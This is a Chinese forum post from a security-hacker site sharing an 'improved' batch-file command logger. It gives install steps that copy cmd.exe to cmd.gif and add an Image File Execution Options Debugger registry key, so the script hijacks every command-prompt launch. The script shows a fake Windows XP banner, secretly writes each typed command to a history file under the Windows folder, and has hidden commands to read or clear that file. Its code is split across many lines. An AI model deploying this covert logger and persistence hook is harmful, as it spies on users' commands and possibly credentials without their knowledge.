文章作者:a11yesno
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
改的不是很良 勉强可用
或许应该弄多一点容错代码 体力活啊。。
安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif 注册表 添加 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cmd.exe 字串 Debugger 字串内容 cmd.gif /c cmd.bat
@echo
off
title %ComSpec%
rem
CMD 记录器 改良版
rem
原作者 superjj(可能是马甲!)
rem
原文的地址:https://forum.eviloctal.com/read-htm-tid-13905-fpage-0-toread--page-2.html
rem
由我allyesno 改良(是本人不是马甲!)
rem
容错代码就不改良了,一些细节部分自己添加!
setlocal
EnableDelayedExpansion
echo
Microsoft Windows XP [版本
5.1
.
2600
]
echo
(
C
)
版权所有
1985
-
2001
Microsoft Corp
.
echo
.
for
/
l %%i in
(
0
,
0
,
0
)
do
(
set
/
p strCMD
=
%
cd
%^
>
if
"
!strcmd!
"
==
"
whoami
"
echo
allyesno&
set
strcmd
=
if
"
!strcmd!
"
==
"
log
"
type
%windir%
history
.
txt&
set
strcmd
=
if
"
!strcmd!
"
==
"
logclear
"
del
%windir%
history
.
txt&
set
strcmd
=
for
/
f
"
delims=
"
%%i in
(
"
!strCMD!
"
)
do
echo
%%i
>>
%windir%
history
.
txt !strCMD!
echo
.
)
